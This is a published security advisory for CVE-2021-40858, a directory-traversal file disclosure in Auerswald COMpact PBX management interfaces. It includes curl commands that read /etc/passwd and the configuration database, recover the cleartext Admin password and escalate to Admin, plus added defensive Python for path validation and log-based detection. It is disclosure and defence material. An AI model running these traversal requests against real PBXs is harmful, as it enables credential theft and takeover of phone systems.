Auerswald COMpact 8.0B Arbitrary File Disclosure

Posted Dec 6, 2021
Site redteam-pentesting.de

RedTeam Pentesting discovered a vulnerability in the web-based management interface of the Auerswald COMpact 5500R PBX which allows users with the "sub-admin" privilege to access any files on the PBX's file system. Versions 8.0B and below are affected.

tags | exploit, web
advisories | CVE-2021-40858
SHA-256 | d996a18ccf6aeaf710400d44518247e46de43b267d135f9213bec807dc59597d

Advisory: Auerswald COMpact Arbitrary File Disclosure


RedTeam Pentesting discovered a vulnerability in the web-based
management interface of the Auerswald COMpact 5500R PBX which allows
users with the "sub-admin" privilege to access any files on the PBX's
file system.


Details
=======

Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")
Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))
Fixed Versions: 8.2B
Vulnerability Type: Arbitrary File Disclosure
Security Risk: medium
Vendor URL: https://www.auerswald.de/en/product/compact-5500r
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-006
Advisory Status: published
CVE: CVE-2021-40858
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40858


Introduction
============

"Fully modular VoIP appliance for more efficient communication processes
With the COMpact 5500R, you are originally equipped for everyday
business - now and in the future.

The fully modular architecture with 80 IP channels and all the functions
of a large ITC server allows up to 112 subscribers and thus scales with
your company.

Continuous maintenance and expansion of the system software makes this
versatile IP server a future-proof investment in any business
communication."

(from the vendor's homepage)


More Details
============

RedTeam Pentesting discovered that attackers with administrative access
to the PBX's web-based management interface (as a so-called "sub-admin")
can download arbitrary files from the PBX's file system. This includes
the configuration database, which is normally not accessible and which
contains the password for the highly privileged "Admin" user in clear text.


Proof of Concept
================

The command-line HTTP client curl[1] can be used to log into the
management interface of the PBX with the username "sub-admin" and the
password "verysecretpassword" as follows:

------------------------------------------------------------------------
$ curl --anyauth --user sub-admin:verysecretpassword --include \
https://192.168.1.2/tree

[...]
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/
[...]

[{"login":2,"userId":2222,[...]}]
------------------------------------------------------------------------

The server returns a session ID in a cookie which is then used to check
the access level:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
https://192.168.1.2/logstatus_state

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"logstatus":"Sub-Administrator"}
------------------------------------------------------------------------

In the PBX's user management, the access level "Sub-Administrator" is
used for user accounts that are allowed to configure the PBX. Other,
higher-level access privileges also exist.

Users with the "sub-admin" privilege can configure music on hold (MOH,
"Wartemusik") and, for example, listen to the currently configured music.
To do this, the browser requests the music files from the PBX.

The file "alarm1.wav" can be accessed with curl as follows:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
'https://192.168.1.2/wartemusik_verwaltung_play?fileName=alarm1.wav'\
'&pageindex=1'

HTTP/1.1 200 OK
Content-Type: audio/x-wav; charset=
Content-Length: 132192
Content-disposition: attachment; filename="alarm1.wav"
[...]
------------------------------------------------------------------------

It was found that the PBX allows directory traversal with the string
"../", so the file "/etc/passwd" can be accessed as follows:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
'https://192.168.1.2/wartemusik_verwaltung_play?'\
'fileName=../../etc/passwd&pageindex='

HTTP/1.1 200 OK
[...]
Content-Length: 113
Content-disposition: attachment; filename="../../etc/passwd"
[...]

root::0:0:root:/root:/bin/sh
netstorage::1:1::/data/ftpd:/bin/false
web::2:2::/opt/auerswald/lighttpd:/bin/false
------------------------------------------------------------------------

The same issue is present in the function for managing logos. A regular
request for the file "logo1.jpg" is shown below:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
'https://192.168.1.2/logo_verwaltung_preview?fileName=logo1.jpg&424'

HTTP/1.1 200 OK
X-XSS-Protection: 1
Content-Type: image/jpg; charset=UTF-8
Content-Length: 13986
Content-disposition: attachment; filename="logo1.jpg"
[...]
------------------------------------------------------------------------

In a similar fashion as before, the file "/etc/passwd" can be accessed:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
'https://192.168.1.2/logo_verwaltung_preview?fileName=../../etc/passwd'

HTTP/1.1 200 OK
[...]

root::0:0:root:/root:/bin/sh
netstorage::1:1::/data/ftpd:/bin/false
web::2:2::/opt/auerswald/lighttpd:/bin/false
------------------------------------------------------------------------
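Both download handlers shown above build a file path from the user-supplied fileName parameter without confining the result to the directory that holds the media files. The following Python is an added example written for this advisory, not code from the PBX or from RedTeam Pentesting; it shows the check such a handler needs. The directory layout, the extension allow-lists and the sample files are assumptions, and the check is run over the fileName values that appear in the advisory (a plain name, the traversal string and a symlink that points out of the media directory).

```python
"""Hardened resolution of a user-supplied fileName parameter (added example)."""
import os
import tempfile
from pathlib import Path

# Assumed extension allow-lists; the real PBX may serve other formats.
ALLOWED_MOH = {".wav"}            # music-on-hold files
ALLOWED_LOGO = {".jpg", ".png"}   # logo files


class RejectedFileName(ValueError):
    """The fileName parameter is not a plain file name inside the base directory."""


def resolve_download(base_dir: str, file_name: str, allowed_suffixes: set) -> Path:
    """Map a (URL-decoded) fileName parameter to a file directly inside base_dir.

    The checks are layered: a syntactic check on the raw parameter, an
    extension allow-list, and a semantic check on the resolved path so that
    symlinks cannot lead outside the base directory either.
    """
    # 1. The parameter must be a bare file name: this rejects "../../etc/passwd",
    #    "/etc/passwd", "sub/x.wav" and the empty string.
    if not file_name or os.path.basename(file_name) != file_name:
        raise RejectedFileName(f"not a plain file name: {file_name!r}")

    # 2. Only the media types this handler exists for may be served. Dotfiles
    #    such as ".." or ".wav" have an empty suffix and are rejected here too.
    if Path(file_name).suffix.lower() not in allowed_suffixes:
        raise RejectedFileName(f"extension not allowed: {file_name!r}")

    # 3. After resolving symlinks, the file must be a direct child of base_dir.
    base = Path(base_dir).resolve()
    candidate = (base / file_name).resolve()
    if candidate.parent != base:
        raise RejectedFileName(f"escapes base directory: {file_name!r}")
    if not candidate.is_file():
        raise FileNotFoundError(file_name)
    return candidate


def check_requests(file_names):
    """Run fileName values through the hardened check in a throw-away tree.

    Constructed layout (assumption): <tmp>/moh/alarm1.wav is a legitimate
    media file, <tmp>/pbx4.db stands in for a sensitive file outside the
    media directory, and <tmp>/moh/link.wav is a symlink pointing at it.
    Returns a mapping fileName -> "served:<name>", "rejected" or "not found".
    """
    with tempfile.TemporaryDirectory() as tmp:
        moh = Path(tmp) / "moh"
        moh.mkdir()
        (moh / "alarm1.wav").write_bytes(b"RIFF....WAVEfmt ")   # constructed stub
        secret = Path(tmp) / "pbx4.db"
        secret.write_bytes(b"constructed sensitive data")
        (moh / "link.wav").symlink_to(secret)                   # symlink escape
        outcome = {}
        for name in file_names:
            try:
                outcome[name] = "served:" + resolve_download(str(moh), name, ALLOWED_MOH).name
            except RejectedFileName:
                outcome[name] = "rejected"
            except FileNotFoundError:
                outcome[name] = "not found"
        return outcome


if __name__ == "__main__":
    for name, result in check_requests(
        ["alarm1.wav", "../../etc/passwd", "/etc/passwd", "link.wav",
         "missing.wav", "alarm1.txt"]
    ).items():
        print(f"{name!r:24} -> {result}")
```

The check must run on the value after the web server has URL-decoded it; a filter that looks for the literal string "../" before decoding misses encoded variants, whereas comparing the resolved path against the base directory is independent of how the input was spelled. The resolved name is also the value that belongs in the Content-disposition header, rather than the raw parameter echoed back as in the responses above.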

For attackers, an interesting file is the SQLite[2] database file
"/data/db/pbx4.db". It can be downloaded as follows:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' 'https://'\
'192.168.1.2/logo_verwaltung_preview?fileName=../../data/db/pbx4.db' \
> pbx4.db

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5120 100 5120 0 0 16253 0 --:--:-- --:--:-- --:--:-- 16305
------------------------------------------------------------------------

This file contains the password for the highly privileged "Admin" user
account:

------------------------------------------------------------------------
$ sqlite3 pbx4.db
SQLite version 3.27.2 2019-02-25 16:06:06
Enter ".help" for usage hints.

sqlite> .tables
DbFileVersion PbxMisc

sqlite> select * from PbxMisc;
[...]
AdminPasswdHash|
AdminLogin|Admin
AdminPin|43214321
AdminPasswd|S3kr1t!
------------------------------------------------------------------------

The username and password can then be used to log into the web
application:

------------------------------------------------------------------------
$ curl --user 'Admin:S3kr1t!' --anyauth --include \
https://192.168.1.2/tree

HTTP/1.1 200 OK
Set-Cookie: AUERSessionID1234123412=AJXGKBFTCIHSHAC; HttpOnly; Path=/
[...]

[{"login":3,"userId":0,"userName":"",[...]}]
------------------------------------------------------------------------

Checking the access level reveals the new privilege:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=AJXGKBFTCIHSHAC' --include \
https://192.168.1.2/logstatus_state

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"logstatus":"Administrator"}
------------------------------------------------------------------------

The user "Admin", in contrast to regular administrative users
("sub-admin"), can access more functions and for example apply firmware
updates.

Workaround
==========

Disable or restrict access to the web-based management if possible.
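Where the interface cannot be taken offline before the firmware is updated, the web server's access log gives a way to notice exploitation attempts against the two endpoints named in this advisory. The following Python is an added example, not part of the advisory or of the vendor's product: it parses access-log lines, extracts the fileName parameter of requests to the affected endpoints and flags values that are not plain file names. The log lines are constructed in Common Log Format as an assumption; the PBX's actual log format is not documented here.

```python
"""Flag directory-traversal attempts against the affected endpoints (added example)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoints named in the advisory that take a fileName parameter.
WATCHED_PATHS = {"/wartemusik_verwaltung_play", "/logo_verwaltung_preview"}

# Constructed sample lines (Common Log Format assumed), modelled on the
# requests shown in the proof of concept; the client addresses are invented.
SAMPLE_LOG = """\
192.168.1.50 - - [06/Dec/2021:10:00:01 +0100] "GET /wartemusik_verwaltung_play?fileName=alarm1.wav&pageindex=1 HTTP/1.1" 200 132192
192.168.1.50 - - [06/Dec/2021:10:00:07 +0100] "GET /wartemusik_verwaltung_play?fileName=../../etc/passwd&pageindex= HTTP/1.1" 200 113
192.168.1.50 - - [06/Dec/2021:10:00:09 +0100] "GET /logo_verwaltung_preview?fileName=logo1.jpg&424 HTTP/1.1" 200 13986
192.168.1.50 - - [06/Dec/2021:10:00:12 +0100] "GET /logo_verwaltung_preview?fileName=..%2F..%2Fdata%2Fdb%2Fpbx4.db HTTP/1.1" 200 5120
192.168.1.51 - - [06/Dec/2021:10:01:00 +0100] "GET /logstatus_state HTTP/1.1" 200 32
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def is_traversal(value: str) -> bool:
    """True when the (decoded) fileName is anything but a plain file name."""
    decoded = unquote(value)   # parse_qs decoded once; catch double encoding too
    return "/" in decoded or "\\" in decoded or ".." in decoded


def parse_line(line: str):
    """Return a finding dict for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if url.path not in WATCHED_PATHS:
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    for value in params.get("fileName", []):
        if is_traversal(value):
            return {
                "ip": m["ip"],
                "time": m["ts"],
                "path": url.path,
                "fileName": unquote(value),
                "status": int(m["status"]),
            }
    return None


def find_traversal_attempts(log_text: str):
    """Scan a whole log; a status of 200 means the file was actually served."""
    return [hit for hit in map(parse_line, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 should be treated as a confirmed disclosure, not merely an attempt, and the "Admin" credentials should then be considered compromised, since the database shown in the proof of concept stores them in clear text.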


Fix
===

Upgrade to a firmware version which corrects this vulnerability.


Security Risk
=============

Attackers who have already acquired administrative access as a so-called
"sub-admin" can download a database file and read the password for the
highly privileged "Admin" account. This account can use more functions and
is allowed to apply firmware updates.

On the one hand, exploiting this vulnerability already requires
administrative access. On the other hand, attackers can obtain
high-privileged access to the PBX and use functions not available to
"sub-admin" users, such as firmware updates. Overall, this vulnerability
is therefore rated as having a medium risk potential.


Timeline
========

2021-08-26 Vulnerability identified
2021-09-01 Customer approved disclosure to vendor
2021-09-10 Vendor notified
2021-09-10 CVE ID requested
2021-09-10 CVE ID assigned
2021-10-05 Vendor provides access to device with fixed firmware
2021-10-11 Vendor provides fixed firmware
2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
2021-12-06 Advisory published


References
==========

[1] https://curl.se
[2] https://www.sqlite.org


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. In this way, security weaknesses
in company networks or products are uncovered and can be fixed promptly.

As there are only a few experts in this field, RedTeam Pentesting wants
to share its knowledge and enhance public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested, please visit:
https://www.redteam-pentesting.de/jobs/


--
RedTeam Pentesting GmbH
Dennewartstr. 25-27
52068 Aachen
Germany
Tel.: +49 241 510081-0
Fax : +49 241 510081-99
https://www.redteam-pentesting.de
Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen